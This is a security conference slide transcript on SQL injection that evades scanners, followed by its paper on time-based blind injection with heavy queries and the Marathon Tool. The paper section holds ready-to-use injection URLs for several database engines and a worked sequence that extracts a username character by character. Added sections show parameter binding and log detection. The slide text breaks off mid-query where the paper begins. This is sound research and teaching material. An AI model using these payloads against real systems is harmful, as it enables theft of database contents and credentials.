How "·$% developers defeat the web vulnerability scanners, by Chema Alonso
How "·$% developers defeat the web vulnerability scanners - Presentation Transcript
1. How ?¿$·& developers defeat the most famous web vulnerability scanners ...or how to recognize old friends. Chema Alonso (Informática64), José Parada (Microsoft Ibérica)
2. Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavy Queries
5.- Conclusions
3. 1.- Introduction
4. SQL Injection is still here among us
5. Web Application Security Consortium comparison (http://projects.webappsec.org/Web-Application-Security-Statistics): 12.186 sites, 97.554 bugs
6. Need to Improve Automatic Scanning
Manual scanning is not always possible:
Time
Confidentiality
Money, money, money…
We need to study new ways to recognize old-fashioned vulnerabilities in order to improve automatic scanning tools.
7. 2.- Inverted Queries
9. Homers, how are they?
Lazy
Badly trained
Poor experience in security stuff
Don't like working
Don't like computing
Don't like coding
Don't like you!
10. Flanders are left-handed
11. Right
SELECT UID
FROM USERS
WHERE NAME='V_NAME'
AND
PASSWORD='V_PASSW';
12. Wrong?
SELECT UID
FROM USERS
WHERE 'V_NAME'=NAME AND
'V_PASSW'=PASSWORD
13. Login Inverted Query
Select uid
From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1
Select uid
From users where 'Robert'=name and 'Kubica' or '1'='1'=password
FAIL
14. Login Inverted SQL Injection: an example
Select uid
From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass='='' or '1'='1' or 'Kubica
Select uid
From users where 'Robert'=name and ''='' or '1'='1' or 'Kubica'=password
Success
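Slides 11 to 14 as an added example that is not part of the original presentation: the two payloads shown above are run against a concatenated normal query, a concatenated inverted query, and the same inverted query with bound parameters. The SQLite in-memory database, its constructed rows and the function names are assumptions made for the illustration; the point is that swapping the operands only changes which test string a scanner needs, while parameter binding removes the flaw in either form.

```python
import sqlite3

# Payloads exactly as they appear on slides 13 and 14.
CLASSIC_PAYLOAD = "Kubica' or '1'='1"
INVERTED_PAYLOAD = "'='' or '1'='1' or 'Kubica"


def make_db():
    """In-memory database with constructed sample rows (not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("Robert", "constructed-pass-1"), ("Alice", "constructed-pass-2")],
    )
    return db


def login_normal_concat(db, v_name, v_pass):
    """Slide 11 ("Right" operand order), still built by string concatenation."""
    sql = ("SELECT uid FROM users WHERE name='" + v_name +
           "' AND password='" + v_pass + "' ORDER BY uid")
    return [row[0] for row in db.execute(sql)]


def login_inverted_concat(db, v_name, v_pass):
    """Slide 12 ("Wrong?" operand order), built by string concatenation."""
    sql = ("SELECT uid FROM users WHERE '" + v_name +
           "'=name AND '" + v_pass + "'=password ORDER BY uid")
    return [row[0] for row in db.execute(sql)]


def login_inverted_bound(db, v_name, v_pass):
    """Same inverted query, but the values are bound and never parsed as SQL."""
    sql = "SELECT uid FROM users WHERE ?=name AND ?=password ORDER BY uid"
    return [row[0] for row in db.execute(sql, (v_name, v_pass))]


def demo():
    """Return the rows each login variant yields for each input."""
    db = make_db()
    return {
        # The case scanners are tuned for: tautology appended after the value.
        "normal+classic": login_normal_concat(db, "Robert", CLASSIC_PAYLOAD),
        # Slide 13: the same string no longer forms a tautology, so a scanner
        # that only sends it would report the page as not injectable.
        "inverted+classic": login_inverted_concat(db, "Robert", CLASSIC_PAYLOAD),
        # Slide 14: the query was injectable all along.
        "inverted+inverted": login_inverted_concat(db, "Robert", INVERTED_PAYLOAD),
        # Bound parameters: both strings are compared as plain passwords.
        "bound+classic": login_inverted_bound(db, "Robert", CLASSIC_PAYLOAD),
        "bound+inverted": login_inverted_bound(db, "Robert", INVERTED_PAYLOAD),
        "bound+valid": login_inverted_bound(db, "Robert", "constructed-pass-1"),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case:18} -> {rows}")
```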
15. Blind Attacks
The attacker injects code but can't access the data directly.
However, the injection changes the behavior of the web application.
The attacker then looks for differences in the response pages between true code injections (1=1) and false code injections (1=2) to extract data.
Blind SQL Injection
Blind XPath Injection
Blind LDAP Injection
16. Blind SQL Injection Attacks
The attacker injects:
"True where clauses"
"False where clauses"
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
The program doesn't return any visible data from the database, nor data in error messages.
The attacker can't see any data extracted from the database.
17. Blind SQL Injection Attacks
The attacker analyzes the response pages, looking for differences between the "True-Answer Page" and the "False-Answer Page":
Different hashes
Different HTML structure
Different patterns (keywords)
Different linear ASCII sums
"Different behavior"
For example: response time
18. Blind SQL Injection Attacks
If any difference exists, then:
The attacker can extract all the information from the database
How? Using "booleanization"
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
"True-Answer Page" or "False-Answer Page"?
MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
Oracle:
Program.php?id=1 and 100>(Select ASCII(Sub
Time-Based Blind SQL Injection Using Heavy Queries
1. Time-Based Blind SQL Injection using Heavy Queries
A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool
Authors: Chema Alonso, Daniel Kachakil, Rodolfo Bordón, Antonio Guzmán and Marta Beltrán
Speakers: Chema Alonso & José Parada Gimeno
Abstract: This document describes how attackers could take advantage of SQL Injection vulnerabilities by means of time-based blind SQL injection using heavy queries. The goal is to stress the importance of establishing secure development best practices for Web applications, and of not entrusting the site's security only to the perimeter defenses. This article shows exploitation examples for some versions of the Microsoft SQL Server, Oracle DB Engine, MySQL and Microsoft Access database engines; nevertheless, the presented technique is applicable to any other database product on the market. This work is accompanied by a tool to prove the technique.
2. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 1 of 12
Index
1. INTRODUCTION
2. "TRICKS" FOR TIME DELAYS
2.1 Microsoft SQL Server 2000/2005
2.2 Microsoft Access 2000
2.3 MySQL 5
2.4 Oracle
3. HEAVY QUERIES
4. MARATHON TOOL
4.1 Configuration Section
4.2 Database Schema
4.3 Debug Log Section
References
Authors
1. INTRODUCTION
The first reference to "blind attacks" using SQL queries was made by Chris Anley in June 2002 ([1]). In that paper the author calls attention to the possibility of creating attacks that avoid the database's error processing by searching for binary behavior in the system's responses. The work proposes a blind security analysis in which the analyst has to infer how to extract information by building SQL queries whose only possible responses are true or false. Furthermore, it proposes different methods for deciding when to consider a system response true or false, among them a time-based criterion.
Anley gives some examples of blind SQL injection techniques in which the information is extracted from the database through a vulnerable parameter. Code is injected through this parameter to generate a delay in the response time when the condition is true:
“if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
…it is possible to determine whether a given bit in a string is '1' or '0'. That is, the above query will
pause for five seconds if bit '@bit' of byte '@byte' in string '@s' is '1'.
For example, the following query:
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
will pause for five seconds if the first bit of the first byte of the name of the current database is 1.”
After this first reference, blind SQL injection techniques continued to be studied, with most
techniques relying on error messages generated by the attacked system, because of the simplicity, quick
execution and extensibility of showing an error message compared with delaying the database. In [2] the
authors analyze different ways to identify a vulnerable parameter in a system exposed to SQL Injection,
even when the information processed and returned by the system is not visible.
At the 2004 BlackHat Conference ([3]), alternative methods to automate the exploitation of a
parameter vulnerable to Blind SQL Injection were proposed, using different custom tools. Three
solutions for the automation were proposed: searching for keywords in positive and
negative results, using MD5 signatures to discriminate positive from negative results, and
employing a textual difference engine. SQueal was also introduced there, an automatic tool to extract
information through Blind SQL Injection, which later evolved into another tool called Absinthe
([4]).
In [5] time-based inference techniques are discussed, and the author proposes other ways to
obtain time delays using calls to stored procedures, such as xp_cmdshell on MS SQL Server to
do a ping:
xp_cmdshell 'ping -n 10 127.0.0.1' [application paused 10 seconds]
Time-based techniques can be extended to any action performed by a stored procedure
capable of generating a time delay or any other measurable action.
In [6] SQL Injection tricks for MySQL are included, with some examples based on benchmark
functions that can generate time delays. For example:
SELECT BENCHMARK(10000000,ENCODE('abc','123')); [around 5 sec]
SELECT BENCHMARK(1000000,MD5(CHAR(116))) [around 7 sec]
Example: SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
An exploit ([7]), published in June 2007, shows how this technique could be used to attack a
game server called Solar Empire. This exploit is a perfect example of how a Time-Based Blind
SQL Injection attack can be done. The next piece of code shows the code injected to delay the
database server's answer:
$sql="F***You'),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw,
".$j.", 1)) =".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";
Figure 1: Exploit for Solar Empire. Blind SQL Injection in blue. Time delay in red.
As the study of time-based Blind SQL Injection techniques moves forward, some new
tools have been created, such as SQL Ninja ([8]), which uses the Wait-for method for Microsoft
SQL Server engines, or SQL PowerInjector ([9]), which implements the Wait-for method for
Microsoft SQL Server database engines, Benchmark functions for MySQL engines, and an
extension of the Wait-for method for Oracle engines, using calls to DBMS_LOCK methods.
2. “TRICKS” FOR TIME DELAYS
Taking into consideration the methods described above, it can be seen that access to
stored procedures is needed on Microsoft SQL Server and Oracle to generate time
delays using calls to Wait-for methods and DBMS_LOCK. This is not necessary on
MySQL engines, because there a mathematical function is used to generate the time delay.
Some Intrusion Detection Systems (IDS) and firewall applications have the ability to block
URLs that use Benchmark functions.
The question now is: if the use of stored procedures and Benchmark functions is ruled out, can
a time-based blind SQL injection still be carried out? The answer is yes. Blind SQL
injection exploits can only be avoided by using the right programming technique. The program
must make sure that none of the code it is going to execute is an attack, or, in Michael Howard’s words:
“All input is evil until proven otherwise.”
A simple way to generate time delays is to take advantage of one of the biggest database
problems, the one that made performance-tuning techniques necessary: heavy
queries. All that is needed to generate a time delay is access to a table with some
records and a “good big query” that forces the engine to work. In other words, a
query built ignoring what performance best practices recommend.
In this example we have a URL with a SQL Injection vulnerability that can be exploited only by
time-based blind SQL injection. This means that the system produces no error message
(figure 2) and we always obtain the same response (sometimes because the query is
right and sometimes because the programmer has coded a default response even when an
error occurs).
Figure 2. Error Condition. The programmer returns a default value → Result 1
2.1 Microsoft SQL Server 2000/2005
In Microsoft SQL Server 2000 and Microsoft SQL Server 2005 engines a heavy query can be
built using tables from the dictionary to which the user has been granted access. In this
example we build a heavy query over the sysusers table.
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers)
As can be seen in figure 3, the query starts at 23:49:11 and ends at 23:49:25, so it lasts 14
seconds. This time delay is caused by the second condition in the “where” clause, because it is a
heavy query. This condition is only executed if the third one is also TRUE;
in this case, “300>(select top 1 ascii(substring(name,1,1)) from sysusers)” is TRUE. We
know that the ASCII value of the first letter of the first username in the sysusers table is lower than 300.
Figure 3: Positive result. The response time is 14 seconds.
As we can see in figure 4, the query starts at 00:00:28 and ends at 00:00:29, which means the query
lasts one second. The response is this fast because the third condition in the where clause is
FALSE, so the database did not have to evaluate the second condition: “0>(select top 1
ascii(substring(name,1,1)) from sysusers)” is FALSE. We know that the ASCII value of
the first letter of the first username in the sysusers table is greater than 0.
Figure 4: Negative result. The response time is 1 second.
With these two queries we can access all the information stored in the database by measuring the
time delays. The main idea is that when the third condition in the query is FALSE, the database
engine stops processing the second condition, because a single FALSE value in a query joined with
“and” operators makes the result FALSE. Therefore, the database engine does not have to
process the heavy query (second condition). So, if we want to know the exact value of the
stored username, we have to move the index and measure the response time with the following
queries:
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers) 14 s TRUE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 0>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150>(select top 1
ascii(substring(name,1,1)) from sysusers) 14 s TRUE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 75>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 100>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 110>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 120>(select top 1
ascii(substring(name,1,1)) from sysusers) 14 s TRUE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 115>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 118>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 119>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
So the result is ASCII(119)='w', and then we start with the second character:
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150>(select top 1
ascii(substring(name,2,1)) from sysusers) ?
This example runs on Microsoft SQL Server 2000, but it works in a similar way on
Microsoft SQL Server 2005.
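The request sequence above leaves a recognizable trace in web server logs. The following sketch is an added example, not part of the original paper or of Marathon Tool: it flags clients whose requests carry a FROM clause listing the same table several times and whose response times split into a fast and a slow group. The log tuples, their layout and the thresholds are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Fragments of the request shape shown on this page, used only as log data.
HEAVY = ("(SELECT+count(*)+FROM+sysusers+AS+sys1,+sysusers+AS+sys2,"
         "+sysusers+AS+sys3,+sysusers+AS+sys4)>1")
TAIL = ">(select+top+1+ascii(substring(name,1,1))+from+sysusers)"

# Constructed sample: (client address, request target, seconds until response).
SAMPLE_LOG = [
    ("10.0.0.5", "/blind2/pista.aspx?id_pista=1", 0.4),
    ("10.0.0.5", "/blind2/pista.aspx?id_pista=7", 6.3),  # slow but ordinary
    ("10.0.0.9", f"/blind2/pista.aspx?id_pista=1+and+{HEAVY}+and+150{TAIL}", 14.2),
    ("10.0.0.9", f"/blind2/pista.aspx?id_pista=1+and+{HEAVY}+and+75{TAIL}", 1.1),
    ("10.0.0.9", f"/blind2/pista.aspx?id_pista=1+and+{HEAVY}+and+100{TAIL}", 0.9),
    ("10.0.0.9", f"/blind2/pista.aspx?id_pista=1+and+{HEAVY}+and+120{TAIL}", 13.8),
]

# A FROM list runs until the closing parenthesis, a WHERE keyword or the end.
FROM_LIST = re.compile(r"\bfrom\s+([^()]+?)(?=\)|\bwhere\b|$)")


def max_self_join(query_string):
    """Largest number of times one table is listed in a single FROM clause."""
    text = unquote_plus(query_string).lower()
    worst = 0
    for match in FROM_LIST.finditer(text):
        tables = Counter(item.split()[0]
                         for item in match.group(1).split(",") if item.strip())
        worst = max(worst, max(tables.values(), default=0))
    return worst


def timing_oracle_suspects(records, min_joins=3, min_gap=5.0):
    """Clients sending self-join requests whose latencies form two groups."""
    by_client = {}
    for client, target, seconds in records:
        query = target.partition("?")[2]
        if max_self_join(query) >= min_joins:
            by_client.setdefault(client, []).append(seconds)
    suspects = {}
    for client, times in by_client.items():
        fast, slow = min(times), max(times)
        # One slow request proves little; a fast/slow split on the same
        # heavy pattern is the true/false signal described above.
        if len(times) >= 2 and slow - fast >= min_gap:
            cut = (fast + slow) / 2
            suspects[client] = {
                "requests": len(times),
                "slow": sum(t >= cut for t in times),
                "fast": sum(t < cut for t in times),
            }
    return suspects


if __name__ == "__main__":
    print(timing_oracle_suspects(SAMPLE_LOG))
```

The ordinary slow request from 10.0.0.5 is not flagged, because latency alone is not the signal; the repeated table in the FROM list is.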
2.2 Microsoft Access 2000
Microsoft Access 2000 databases contain a small set of tables that store information about the
objects created in them. One of these tables is MSysAccessObjects, and by default all users
connected to the database are granted access to it. This table stores some records, so it is
perfect for a time-based Blind SQL Injection attack. Figures 5 and 6 show how to do it:
http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and (SELECT count(*) FROM
MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3,
MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS
T9,MSysAccessObjects AS T10)>0 and exists (select * from contrasena)
This example shows a heavy query for Microsoft Access 2000 databases with a delay of six
seconds. An attacker can extract all the information using the same method shown in the Microsoft
SQL Server example, using this heavy query as the second condition in the “where” clause to
delay the response for positive answers.
Figure 5: Positive Result in a Microsoft Access 2000 database. The response time is 6 seconds.
Figure 6. Negative Result in a Microsoft Access 2000 database. The response time is 1 second.
2.3 MySQL 5
MySQL 5.x adds new features over prior versions, including a new dictionary in the schema
called Information_Schema. In previous versions of MySQL it is necessary to know or to guess a
table with some records in order to do an injection with a heavy query. In this
example a Time-Based Blind SQL injection attack with a heavy query was tested using the
columns table from Information_Schema on MySQL version 5. The results obtained are shown
in figures 7 and 8.
http://www.kachakil.com/pista.aspx?id_pista=1 and exists (select * from contrasena) and 100 >
(select count(*) from information_schema.columns, information_schema.columns T1,
information_schema T2)
Figure 7. Positive Result in a MySQL database. The response time is 30 seconds.
Figure 8. Negative Result in a MySQL database. The response time is 1 second.
2.4 Oracle
In this example, on an Oracle Database engine, a heavy query over the all_users view from
the sys schema was used to obtain a time delay. Select on this view is granted to all
users with the Connect role. In this case, the query extracts information about the first letter
of the username in the first record of the view itself. The results are displayed in figures 9 and 10.
http://blind.elladodelmal.com/oracle/pista.aspx?id_pista=1 and (select count(*) from all_users t1, all_users
t2, all_users t3, all_users t4, all_users t5)>0 and 300>(ascii(SUBSTR((select username from all_users
where rownum = 1),1,1))
Figure 9. Positive Answer in an Oracle database. The response time is 40 seconds.
Figure 10. Negative answer in an Oracle database. The response time is 1 second.
3. HEAVY QUERIES
As these simple examples have shown, an attacker can exploit a time-based blind SQL
injection just by using any heavy query. Furthermore, the attacker can use this
method with any database engine if they know (or can guess) the name of a table that contains
records. Thus, the perimeter protection countermeasures normally deployed as part of a
defense-in-depth policy, such as disabling access to stored procedures or benchmark functions,
definitely do not protect the system from these attacks. Developing secure code is the key to
avoiding these kinds of vulnerabilities.
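The coding flaw behind the examples above, next to a hardened form, as an added example that is not code from the paper or from the applications it tested. The table, column and function names are assumptions, and an in-memory SQLite database stands in for the engines discussed.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the table behind pista.aspx?id_pista=...
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pistas (id_pista INTEGER PRIMARY KEY, texto TEXT)")
    db.executemany("INSERT INTO pistas VALUES (?, ?)",
                   [(1, "first hint"), (2, "second hint")])
    return db


def get_pista_vulnerable(db, id_pista):
    # 'Before': the request value is pasted into the statement text.
    # Doubling quotes does not help, because a numeric context needs no
    # quotes: "2 and <condition>" becomes part of the WHERE clause.
    value = id_pista.replace("'", "''")
    sql = "SELECT texto FROM pistas WHERE id_pista = " + value
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        rows = []
    # Same default page on error or on no rows, as in the scenario described.
    return rows[0][0] if rows else "default page"


def get_pista_hardened(db, id_pista):
    # 'After': check the type first, then bind the value as a parameter so
    # the statement text never contains request data.
    if not (id_pista.isascii() and id_pista.isdigit() and len(id_pista) <= 9):
        raise ValueError("id_pista must be a non-negative integer")
    rows = db.execute("SELECT texto FROM pistas WHERE id_pista = ?",
                      (int(id_pista),)).fetchall()
    return rows[0][0] if rows else "default page"


def condition_reaches_engine(handler, db):
    """True if a condition appended to id_pista changes what the handler returns."""
    try:
        return handler(db, "2 and 1=1") != handler(db, "2 and 1=0")
    except ValueError:
        return False  # rejected before any SQL was built


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", condition_reaches_engine(get_pista_vulnerable, db))
    print("hardened:  ", condition_reaches_engine(get_pista_hardened, db))
```

Once the appended condition no longer reaches the engine, there is nothing for a heavy query to be attached to, whatever tables the database account can read.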
In this paper very heavy queries have been used just to obtain an easily measurable
time delay, but in a real exploitation of this technique a better adjusted “heavy query” should be
used for faster, more optimized information extraction.
As a better illustration we developed a tool that extracts information from databases using this
method; it is explained in the following section.
4. MARATHON TOOL
Marathon Tool is a POC of using heavy queries to perform a Time-Based Blind SQL
Injection attack. The tool is still in progress, but it is already a very good alpha version for
extracting information from web applications that use Microsoft SQL Server, MySQL or Oracle
databases.
4.1. Configuration Section
First of all, information about the web application must be configured in this section. This
information is in the Basic Configuration panel:
Figure 11: Marathon Tool Configuration Section. Basic Configuration Panel.
- Database Engine: Microsoft SQL Server, MySQL or Oracle Database Server. When
Microsoft SQL Server is selected, Marathon Tool will use, by default, the sys.databases or
sysusers tables to construct the heavy queries. If Oracle Database is selected, the
tables used by default will be user_objects, all_objects or user_tables. For MySQL,
the table configured by default is information_schema.columns. These tables can be
changed in the injection options.
- Target base URL: Web application to test and connection details. SSL is not supported
in this version.
- Parameters: These can be GET or POST parameters, and can be injectable parameters or
not. The application will try to find heavy queries for all the injectable ones.
- Cookies: A list of variables and values in the cookie can be configured in this section,
but this version does not support dynamic values.
- Authentication: In this section user credentials can be set up to connect to the web
application before starting the test. This version supports Basic, Digest and NTLM
authentication methods.
- Proxy: An HTTP proxy can be set up.
- Start Injection with and End Injection with: These are used to configure a prefix and/or a suffix
value in the injection test.
Figure 12: Marathon Tool Configuration Section. Authentication Methods.
As can be seen in Figure 13, there are several parameters in the injection options panel that can
be tuned to improve the performance of the tool:
Figure 13: Marathon Tool Configuration Section. Basic Configuration Panel.
- Min heavy query time: This parameter sets the minimum time difference between a true
answer and a false answer. If the difference between the true response time and the false
response time is lower than this value, Marathon Tool will keep looking for a new
heavy query. If the tool is being tested on a local network with a very good connection,
this value can be small; otherwise the value should be increased.
- Http request timeout: After this time the client closes the connection and treats the
query as a heavy query.
- Request tests count: Once the tool detects a true answer, it repeats the test to make sure the
delay is due to the heavy query and not to any other reason.
- Pause after heavy query: After every heavy query the tool pauses for this time. This is
because a large number of big heavy queries at the same time could result in false
positives or in a denial of service attack against the web application.
- Pause after any query: After every query, whether it is a heavy one or not, the tool
pauses for this time.
- Minimum joins for queries: This value is the initial number of tables used in a query when
the tool is looking for a heavy query.
- Maximum joins for queries: If the tool has not found a heavy query after constructing a
query with this number of tables in the join clause, the tool stops.
- Enable equal sign in selects: Depending on the web application, web firewalls or
databases, the tool constructs the heavy queries using
relational operators or equality operators.
- Heavy queries tables: These are the tables Marathon Tool will use to construct heavy
queries. The tool configures different ones depending on the database engine selected,
but they can also be entered by the user.
Once the Configuration section is ready and the injection options are configured, Marathon Tool
needs to initialize the test. In this initialization test Marathon Tool looks for a valid heavy
query in the injectable value to prove that the configuration is valid. When it has finished, the tool can
retrieve the schema of the database or the user that the web application uses to connect to
the database engine.
Figure 14: Marathon Tool Configuration Section. Basic Start Injection.
4.2. Database Schema
This section shows the information Marathon Tool has collected from the web application using
Time-Based Blind SQL Injection with heavy queries. It is not a quick method for extracting
information, but for some web applications based on database engines without time-delay
functions it could be the only exploitation method.
Figure 15: Marathon Tool Database Schema
4.3. Debug Log Section
This panel shows the queries sent to the web application. It has different detail levels to
show all the tests, only the positive answers or only the values Marathon Tool is collecting. This
log is a good tool for analyzing the behaviour of the web application during the test, and it is
useful for tuning purposes.
Figure 16: Marathon Tool Debug Log Section
References
[1] “(More) Advanced SQL Injection”. Author: Chris Anley. NGS Software. URL: http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
[2] “Blindfolded SQL Injection”. Authors: Ofer Maor and Amichai Shulman. Imperva. URL: http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
[3] “Blind SQL Injection Automation Techniques”. Author: Cameron Hotchkies. BlackHat Conferences. URL: https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf
[4] “Absinthe”. Author: Cameron Hotchkies. 0x90. URL: http://www.0x90.org/releases/absinthe/download.php
[5] “Data Mining with SQL Injection and Inference”. Author: David Litchfield. NGS Software. URL: http://www.ngssoftware.com/research/papers/sqlinference.pdf
[6] “SQL Injection Cheat Sheet”. Author: Ronald van den Heetkamp. 0x000000. URL: http://www.0x000000.com/?i=14&bin=1110
[7] “Solar Empire’s Exploit”. Author: Blackhawk. Milw0rm. URL: http://www.milw0rm.com/exploits/4078
[8] “…a SQL Server Injection & takeover tool…”. Author: icesurfer. SQLNinja. URL: http://sqlninja.sourceforge.net
[9] “SQL PowerInjector”. Author: Francois Larouche. SQL PowerInjector. URL: http://www.sqlpowerinjector.com
Authors
Chema Alonso is a Computer Engineer from Rey Juan Carlos University and a System Engineer from the
Politécnica University of Madrid. He has been working as a security consultant for the last six years and has been awarded
Microsoft Most Valuable Professional from 2005 to the present. He is a frequent speaker for Microsoft at security
conferences. He writes monthly in several Spanish technical magazines such as “Windows TI Magazine”, “PC Actual” or
“Hackin9”. He is currently working on his PhD thesis under the direction of Dr. Antonio Guzmán and Dr. Marta Beltrán.
chema@informatica64.com
Daniel Kachakil received the degree in Systems Engineering and the Master's degree in Software Engineering from the
University Politécnica of Valencia. dani@kachakil.com
Rodolfo Bordón received the degree of Software Specialist Technician and works as a System Security Consultant.
rodol@informatica64.com
Antonio Guzmán received the degree in Physics Science in 1999 and the Ph.D. degree in Computer Science in 2006 from
Rey Juan Carlos University of Madrid, Spain. Since 2000, he has been an Assistant Professor with the Department of
Computer Architecture and Technology, Rey Juan Carlos University. Antonio.guzman@urjc.es
Marta Beltrán received the Laurea cum Laude degree in electronic engineering in 2000 from Complutense University
of Madrid, Spain, and the degree in Physics Science in 2002 from UNED, Spain. She received the Ph.D. degree in
Computer Science in 2005 from Rey Juan Carlos University of Madrid, Spain. From 2000 to 2006 she worked as
assistant professor at Rey Juan Carlos University. Since 2006 she has been Titular Professor at the same university.
Marta.beltran@urjc.es